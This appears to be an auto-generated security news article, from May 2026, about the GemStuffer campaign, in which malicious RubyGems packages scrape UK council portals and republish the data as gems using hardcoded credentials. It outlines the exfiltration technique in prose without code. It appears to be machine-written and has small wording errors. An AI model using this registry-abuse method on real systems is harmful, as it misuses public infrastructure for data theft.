Ethical Hacking News
GemStuffer, a novel campaign of data exfiltration through RubyGems, has been discovered by researchers. Over 150 gems have been found to be infected with malicious scripts designed to collect sensitive data from public-facing council portals in the United Kingdom.
GemStuffer campaign infects over 150 gems with malicious scripts designed to exfiltrate sensitive data from UK council portals.The attack leverages RubyGems package manager to deliver payloads, fetching public-facing council portal URLs and publishing the collected responses as valid .gem archives.The campaign shares similarities with a recent major malicious attack on RubyGems, which temporarily disabled new account registration.Users are urged to exercise caution when working with third-party libraries and dependencies, emphasizing the importance of regular software supply chain updates and audits.
GemStuffer, a newly disclosed campaign, has been found to abuse the RubyGems repository by infecting over 150 gems with malicious scripts designed to exfiltrate sensitive data from public-facing council portals in the United Kingdom. The attack, which was discovered by cybersecurity researchers, leverages the RubyGems package manager as a means of delivering the malicious payloads.
According to Socket, a security researcher who analyzed the GemStuffer campaign, the packages do not appear to be designed for mass developer compromise, with many having little or no download activity. However, the scripts within these gems fetch pages from U.K. local government democratic services portals, package the collected responses into valid .gem archives, and publish those gems back to RubyGems using hardcoded API keys.
The development comes as a major malicious attack was reported on RubyGems itself, leading to the temporary disabling of new account registration. While it is unclear whether the two events are related, Socket noted that GemStuffer shares the same abuse pattern, which involves using newly created packages with junk names to host the scraped data.
At its core, the GemStuffer campaign abuses RubyGems as a means of staging the scraped council content. It accomplishes this by fetching hardcoded U.K. council portal URLs, packaging the HTTP responses into valid .gem archives, and publishing those archives to RubyGems using embedded registry credentials.
In some cases, the payload embedded within the gem creates a temporary RubyGems credential environment under "/tmp," overrides the HOME environment variant, builds a gem locally, and pushes it to RubyGems using the gem command-line interface (CLI), rather than depending on pre-existing RubyGems credentials on the target machine. Other variants of the malicious gems eschew the CLI component in favor of uploading the archive directly to the RubyGems API via an HTTP POST request.
Once the new gems have been published, all an attacker has to do is run a "gem fetch" command with the gem name and version to access the scraped data. The novel scraping campaign has been found to target public-facing ModernGov portals used by Lambeth, Wandsworth, and Southwark, aiming to collect committee meeting calendars, agenda item listings, linked PDF documents, officer contact information, and RSS feed content.
It is not clear what exactly the end goals are for this attack, as the information appears to be publicly accessible anyway. However, Socket has assessed that the systematic bulk collection and archival of this data raises the possibility that the attacker may be leveraging council portal access as a pivot to demonstrate capability against government infrastructure.
The mechanics behind GemStuffer are intentional, with repeated gem generation, version increments, hardcoded RubyGems credentials, direct registry pushes, and scraped data embedded inside package archives. The campaign's true nature remains unclear, ranging from "registry spam" or a proof-of-concept worm to an automated scraper misusing RubyGems as a storage layer.
In the wake of this discovery, cybersecurity professionals are urging users to exercise caution when working with third-party libraries and dependencies, emphasizing the importance of regularly updating and auditing their software supply chain.
Related Information:
https://www.ethicalhackingnews.com/articles/GemStuffer-A-Novel-Campaign-of-Data-Exfiltration-through-RubyGems-ehn.shtml
https://thehackernews.com/2026/05/gemstuffer-abuses-150-rubygems-to.html
Published: Wed May 13 04:57:02 2026 by llama3.2 3B Q4_K_M
